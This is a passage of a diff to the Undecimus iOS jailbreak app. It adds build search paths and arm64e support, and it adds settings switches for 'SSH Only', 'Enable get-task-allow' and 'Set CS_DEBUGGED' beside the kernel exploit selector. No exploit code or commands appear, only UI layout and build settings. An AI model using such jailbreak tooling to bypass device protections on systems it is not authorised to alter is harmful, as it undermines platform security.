 					"$(PROJECT_DIR)/patchfinder64",
 					"$(PROJECT_DIR)/snappy",
 					"$(PROJECT_DIR)/Injector",
+					"$(PROJECT_DIR)/offset-cache",
+					"$(PROJECT_DIR)/kerneldec",
 				);
 				INFOPLIST_FILE = Undecimus/Info.plist;
 				IPHONEOS_DEPLOYMENT_TARGET = 11.0;
@@ -878,6 +890,7 @@
 				PRODUCT_NAME = "$(TARGET_NAME)";
 				PROVISIONING_PROFILE_SPECIFIER = "";
 				TARGETED_DEVICE_FAMILY = "1,2";
+				VALID_ARCHS = "arm64 arm64e";
 			};
 			name = Release;
 		};

Undecimus/Main.storyboard

@@ -240,7 +240,7 @@
                             <tableViewSection headerTitle="Preferences" id="XCt-Li-vAj">
                                 <cells>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" accessoryType="disclosureIndicator" indentationWidth="10" id="gWH-ns-VTA">
-                                        <rect key="frame" x="0.0" y="55.333333333333343" width="375" height="44"/>
+                                        <rect key="frame" x="0.0" y="55.333333333333336" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="gWH-ns-VTA" id="9m4-ed-7c0">
                                             <rect key="frame" x="0.0" y="0.0" width="341" height="44"/>
@@ -747,7 +747,7 @@
                                         <rect key="frame" x="0.0" y="715.33333333333337" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="MLC-DO-3b9" id="HLa-sD-hEI">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="5ao-Ni-cdG">
@@ -777,11 +777,113 @@
                                         </tableViewCellContentView>
                                         <color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                     </tableViewCell>
-                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="VAY-4U-acE">
+                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="28P-wg-gQj">
                                         <rect key="frame" x="0.0" y="759.33333333333337" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
+                                        <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="28P-wg-gQj" id="maO-LE-rdL">
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <autoresizingMask key="autoresizingMask"/>
+                                            <subviews>
+                                                <switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="rYA-6q-037">
+                                                    <rect key="frame" x="306" y="6.3333333333333321" width="51" height="30.999999999999996"/>
+                                                    <color key="onTintColor" red="0.0" green="0.47843137250000001" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
+                                                    <connections>
+                                                        <action selector="sshOnlySwitchTriggered:" destination="ScN-Hx-Um8" eventType="valueChanged" id="YJ7-k5-jX0"/>
+                                                    </connections>
+                                                </switch>
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="SSH Only" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="j6O-q3-UUd">
+                                                    <rect key="frame" x="15" y="11.666666666666666" width="225" height="20.333333333333336"/>
+                                                    <constraints>
+                                                        <constraint firstAttribute="height" constant="20.5" id="WGe-9B-keN"/>
+                                                        <constraint firstAttribute="width" relation="greaterThanOrEqual" constant="225" id="cyw-H2-26F"/>
+                                                    </constraints>
+                                                    <fontDescription key="fontDescription" type="system" pointSize="17"/>
+                                                    <nil key="textColor"/>
+                                                    <nil key="highlightedColor"/>
+                                                </label>
+                                            </subviews>
+                                            <constraints>
+                                                <constraint firstAttribute="trailing" secondItem="rYA-6q-037" secondAttribute="trailing" constant="20" id="0bL-N1-ipU"/>
+                                                <constraint firstItem="j6O-q3-UUd" firstAttribute="leading" secondItem="maO-LE-rdL" secondAttribute="leading" constant="15" id="DUH-dl-Zm5"/>
+                                                <constraint firstItem="rYA-6q-037" firstAttribute="centerY" secondItem="maO-LE-rdL" secondAttribute="centerY" id="XJC-6Q-R42"/>
+                                                <constraint firstItem="j6O-q3-UUd" firstAttribute="centerY" secondItem="maO-LE-rdL" secondAttribute="centerY" id="vwh-aK-hAh"/>
+                                            </constraints>
+                                        </tableViewCellContentView>
+                                        <color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                    </tableViewCell>
+                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="JbV-km-4oP">
+                                        <rect key="frame" x="0.0" y="803.33333333333337" width="375" height="44"/>
+                                        <autoresizingMask key="autoresizingMask"/>
+                                        <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="JbV-km-4oP" id="VgQ-Yz-hC6">
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <autoresizingMask key="autoresizingMask"/>
+                                            <subviews>
+                                                <switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="ZUT-0k-3Ie">
+                                                    <rect key="frame" x="306" y="6.3333333333333321" width="51" height="30.999999999999996"/>
+                                                    <color key="onTintColor" red="0.0" green="0.47843137250000001" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
+                                                    <connections>
+                                                        <action selector="enableGetTaskAllowSwitchTriggered:" destination="ScN-Hx-Um8" eventType="valueChanged" id="ish-Sv-CH9"/>
+                                                    </connections>
+                                                </switch>
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Enable get-task-allow" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="DmB-Px-2xp">
+                                                    <rect key="frame" x="15" y="11.666666666666666" width="225" height="20.333333333333336"/>
+                                                    <constraints>
+                                                        <constraint firstAttribute="width" relation="greaterThanOrEqual" constant="225" id="EK9-0g-VAo"/>
+                                                        <constraint firstAttribute="height" constant="20.5" id="NTl-WS-baI"/>
+                                                    </constraints>
+                                                    <fontDescription key="fontDescription" type="system" pointSize="17"/>
+                                                    <nil key="textColor"/>
+                                                    <nil key="highlightedColor"/>
+                                                </label>
+                                            </subviews>
+                                            <constraints>
+                                                <constraint firstItem="DmB-Px-2xp" firstAttribute="leading" secondItem="VgQ-Yz-hC6" secondAttribute="leading" constant="15" id="Rjr-SM-kcJ"/>
+                                                <constraint firstItem="ZUT-0k-3Ie" firstAttribute="centerY" secondItem="VgQ-Yz-hC6" secondAttribute="centerY" id="nTB-PW-aSv"/>
+                                                <constraint firstItem="DmB-Px-2xp" firstAttribute="centerY" secondItem="VgQ-Yz-hC6" secondAttribute="centerY" id="qxf-C8-t8X"/>
+                                                <constraint firstAttribute="trailing" secondItem="ZUT-0k-3Ie" secondAttribute="trailing" constant="20" id="sVf-n8-tCM"/>
+                                            </constraints>
+                                        </tableViewCellContentView>
+                                        <color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                    </tableViewCell>
+                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="GaW-zb-gDk">
+                                        <rect key="frame" x="0.0" y="847.33333333333337" width="375" height="44"/>
+                                        <autoresizingMask key="autoresizingMask"/>
+                                        <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="GaW-zb-gDk" id="vnE-bC-Wws">
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <autoresizingMask key="autoresizingMask"/>
+                                            <subviews>
+                                                <switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="pFK-3o-h3F">
+                                                    <rect key="frame" x="306" y="6.3333333333333321" width="51" height="30.999999999999996"/>
+                                                    <color key="onTintColor" red="0.0" green="0.47843137250000001" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
+                                                    <connections>
+                                                        <action selector="setCSDebugged:" destination="ScN-Hx-Um8" eventType="valueChanged" id="Ymm-xh-9VM"/>
+                                                    </connections>
+                                                </switch>
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Set CS_DEBUGGED" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="3iP-x8-n2H">
+                                                    <rect key="frame" x="15" y="11.666666666666666" width="225" height="20.333333333333336"/>
+                                                    <constraints>
+                                                        <constraint firstAttribute="height" constant="20.5" id="0Sj-fO-0oC"/>
+                                                        <constraint firstAttribute="width" relation="greaterThanOrEqual" constant="225" id="AKX-II-8QD"/>
+                                                    </constraints>
+                                                    <fontDescription key="fontDescription" type="system" pointSize="17"/>
+                                                    <nil key="textColor"/>
+                                                    <nil key="highlightedColor"/>
+                                                </label>
+                                            </subviews>
+                                            <constraints>
+                                                <constraint firstAttribute="trailing" secondItem="pFK-3o-h3F" secondAttribute="trailing" constant="20" id="Fsj-GD-YN3"/>
+                                                <constraint firstItem="3iP-x8-n2H" firstAttribute="leading" secondItem="vnE-bC-Wws" secondAttribute="leading" constant="15" id="Fuk-EG-rEx"/>
+                                                <constraint firstItem="3iP-x8-n2H" firstAttribute="centerY" secondItem="vnE-bC-Wws" secondAttribute="centerY" id="GkK-1T-bay"/>
+                                                <constraint firstItem="pFK-3o-h3F" firstAttribute="centerY" secondItem="vnE-bC-Wws" secondAttribute="centerY" id="a4a-g4-CvD"/>
+                                            </constraints>
+                                        </tableViewCellContentView>
+                                        <color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                    </tableViewCell>
+                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="VAY-4U-acE">
+                                        <rect key="frame" x="0.0" y="891.33333333333337" width="375" height="44"/>
+                                        <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="VAY-4U-acE" id="f58-Sa-aTz">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Kernel Exploit" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="F0s-FE-1BJ">
@@ -805,8 +907,8 @@
                                                         <segment title="MP"/>
                                                         <segment title="AW"/>
                                                         <segment title="VS"/>
-                                                        <segment title="V1"/>
-                                                        <segment title="V3"/>
+                                                        <segment title="M1"/>
+                                                        <segment title="M2"/>
                                                     </segments>
                                                     <connections>
                                                         <action selector="KernelExploitSegmentedControl:" destination="ScN-Hx-Um8" eventType="valueChanged" id="Lgd-u2-qmM"/>
@@ -823,10 +925,10 @@
                                         <color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="RoJ-Zg-nGn">
-                                        <rect key="frame" x="0.0" y="803.33333333333337" width="375" height="44"/>
+                                        <rect key="frame" x="0.0" y="935.33333333333337" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="RoJ-Zg-nGn" id="bjb-rj-ILk">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <textField opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" placeholder="0x292dd10b56d87a3a" textAlignment="right" minimumFontSize="17" translatesAutoresizingMaskIntoConstraints="NO" id="AmI-8O-WbP">
@@ -863,10 +965,10 @@
                                         <color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="biY-DV-Cta">
-                                        <rect key="frame" x="0.0" y="847.33333333333337" width="375" height="44"/>
+                                        <rect key="frame" x="0.0" y="979.33333333333337" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="biY-DV-Cta" id="rBs-X3-4zg">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <textField opaque="NO" contentMode="scaleToFill" enabled="NO" contentHorizontalAlignment="left" contentVerticalAlignment="center" placeholder="XXXXXXXXXXXXXXXX" textAlignment="right" minimumFontSize="17" translatesAutoresizingMaskIntoConstraints="NO" id="s5y-Jh-zXs">
@@ -900,10 +1002,10 @@
                                         <color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="oC8-uX-vAJ">
-                                        <rect key="frame" x="0.0" y="891.33333333333337" width="375" height="44"/>
+                                        <rect key="frame" x="0.0" y="1023.3333333333335" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="oC8-uX-vAJ" id="82P-vy-Ygt">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Expiry" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="PKH-cg-Hb6">
@@ -933,7 +1035,7 @@
                                         <color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="NWI-5m-CqO">
-                                        <rect key="frame" x="0.0" y="935.33333333333337" width="375" height="44"/>
+                                        <rect key="frame" x="0.0" y="1067.3333333333335" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="NWI-5m-CqO" id="UhO-Lz-lTj">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
@@ -970,7 +1072,7 @@
                             <tableViewSection headerTitle="Utilities" footerTitle="PLACEHOLDER" id="33o-xO-9yG">
                                 <cells>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" selectionStyle="blue" hidesAccessoryWhenEditing="NO" indentationLevel="1" indentationWidth="0.0" id="2Iu-w9-x4b">
-                                        <rect key="frame" x="0.0" y="1042.6666666666667" width="375" height="44"/>
+                                        <rect key="frame" x="0.0" y="1174.6666666666667" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="2Iu-w9-x4b" id="t4K-YB-H8y">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
@@ -994,7 +1096,7 @@
                                         <color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" selectionStyle="blue" hidesAccessoryWhenEditing="NO" indentationLevel="1" indentationWidth="0.0" id="DTa-Xu-fsT">
-                                        <rect key="frame" x="0.0" y="1086.6666666666667" width="375" height="44"/>
+                                        <rect key="frame" x="0.0" y="1218.6666666666667" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="DTa-Xu-fsT" id="krI-4z-ctw">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
@@ -1018,7 +1120,7 @@
                                         <color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" selectionStyle="blue" hidesAccessoryWhenEditing="NO" indentationLevel="1" indentationWidth="0.0" id="LaS-Im-6eS">
-                                        <rect key="frame" x="0.0" y="1130.6666666666667" width="375" height="44"/>
+                                        <rect key="frame" x="0.0" y="1262.6666666666667" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="LaS-Im-6eS" id="dcQ-Ib-8Mg">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
@@ -1042,7 +1144,7 @@
                                         <color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" selectionStyle="blue" hidesAccessoryWhenEditing="NO" indentationLevel="1" indentationWidth="0.0" id="yX4-Fp-ygw">
-                                        <rect key="frame" x="0.0" y="1174.6666666666667" width="375" height="44"/>
+                                        <rect key="frame" x="0.0" y="1306.6666666666667" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="yX4-Fp-ygw" id="jeW-Es-OSZ">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
@@ -1066,7 +1168,7 @@
                                         <color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" selectionStyle="blue" hidesAccessoryWhenEditing="NO" indentationLevel="1" indentationWidth="0.0" id="N5h-RW-loI">
-                                        <rect key="frame" x="0.0" y="1218.6666666666667" width="375" height="44"/>
+                                        <rect key="frame" x="0.0" y="1350.6666666666667" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="N5h-RW-loI" id="yqV-gg-joY">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
@@ -1090,7 +1192,7 @@
                                         <color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" selectionStyle="blue" hidesAccessoryWhenEditing="NO" indentationLevel="1" indentationWidth="0.0" id="5p2-OT-Rp8">
-                                        <rect key="frame" x="0.0" y="1262.6666666666667" width="375" height="44"/>
+                                        <rect key="frame" x="0.0" y="1394.666666666667" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="5p2-OT-Rp8" id="psM-OR-RxD">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
@@ -1114,7 +1216,7 @@
                                         <color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" selectionStyle="blue" hidesAccessoryWhenEditing="NO" indentationLevel="1" indentationWidth="0.0" id="G9h-ne-rnX">
-                                        <rect key="frame" x="0.0" y="1306.6666666666667" width="375" height="44"/>
+                                        <rect key="frame" x="0.0" y="1438.666666666667" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="G9h-ne-rnX" id="WdA-qm-GQq">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
@@ -1138,7 +1240,7 @@
                                         <color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" selectionStyle="blue" hidesAccessoryWhenEditing="NO" indentationLevel="1" indentationWidth="0.0" id="meU-ko-WL5">
-                                        <rect key="frame" x="0.0" y="1350.6666666666667" width="375" height="44"/>
+                                        <rect key="frame" x="0.0" y="1482.666666666667" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="meU-ko-WL5" id="d4g-il-Gek">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
@@ -1176,6 +1278,7 @@
                         <outlet property="DisableAutoUpdatesSwitch" destination="P95-aF-zxV" id="pt6-rJ-pGS"/>
                         <outlet property="DumpAPTicketSwitch" destination="xWn-fd-7EJ" id="cJp-cM-DRn"/>
                         <outlet property="ECIDLabel" destination="s5y-Jh-zXs" id="fp0-05-Dgr"/>
+                        <outlet property="EnableGetTaskAllowSwitch" destination="ZUT-0k-3Ie" id="Rl0-Qq-dLN"/>
                         <outlet property="ExpiryLabel" destination="Ggb-8F-dfb" id="Dh4-If-9ID"/>
                         <outlet property="ExportKernelTaskPortSwitch" destination="HCT-C6-X9W" id="1iJ-hC-FYO"/>
                         <outlet property="HideLogWindowSwitch" destination="okw-vN-Hf5" id="bNO-DC-3Nn"/>
@@ -1189,6 +1292,8 @@
                         <outlet property="ResetCydiaCacheSwitch" destination="5ao-Ni-cdG" id="qLZ-1Y-2nV"/>
                         <outlet property="RestartSpringBoardButton" destination="sBD-7B-tON" id="T9J-Es-GVJ"/>
                         <outlet property="RestoreRootFSSwitch" destination="Vce-QD-qkd" id="Psh-NM-sAb"/>
+                        <outlet property="SSHOnlySwitch" destination="rYA-6q-037" id="VbR-6i-RyR"/>
+                        <outlet property="SetCSDebuggedSwitch" destination="pFK-3o-h3F" id="jCE-dy-ZHi"/>
                         <outlet property="ShareDiagnosticsDataButton" destination="j3u-pn-SGo" id="0cM-Vu-e4I"/>
                         <outlet property="TweakInjectionSwitch" destination="fAs-8y-ldG" id="TY7-Ea-A2P"/>
                         <outlet property="UptimeLabel" destination="bqj-Fm-PHO" id="fjE-SR-FQI"/>
@@ -1199,7 +1304,7 @@
                 </tableViewController>
                 <placeholder placeholderIdentifier="IBFirstResponder" id="upc-ND-SAi" userLabel="First Responder" sceneMemberID="firstResponder"/>
             </objects>
-            <point key="canvasLocation" x="2523.75" y="31.690140845070424"/>
+            <point key="canvasLocation" x="2522.4000000000001" y="31.03448275862069"/>
         </scene>
         <!--Special Thanks-->
         <scene sceneID="x6W-Dv-xaI">
@@ -1213,7 +1318,7 @@
                             <tableViewSection headerTitle="Special Thanks" id="jVv-CN-a4D">
                                 <cells>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="PWq-RA-Bdq">
-                                        <rect key="frame" x="0.0" y="55.333333333333336" width="375" height="44"/>
+                                        <rect key="frame" x="0.0" y="55.333333333333343" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="PWq-RA-Bdq" id="NA3-Xy-goc">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
@@ -1329,7 +1434,7 @@
                                         <color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="C5Y-s6-5c4">
-                                        <rect key="frame" x="0.0" y="231.33333333333334" width="375" height="44"/>
+                                        <rect key="frame" x="0.0" y="231.33333333333334" width="375" height="44.000000000000028"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="C5Y-s6-5c4" id="MbC-8G-ZMQ">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
@@ -1709,7 +1814,7 @@
                                         <rect key="frame" x="0.0" y="803.33333333333337" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="bji-Co-cbU" id="hLg-v2-ExB">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
                                             <autoresizingMask key="autoresizingMask"/>
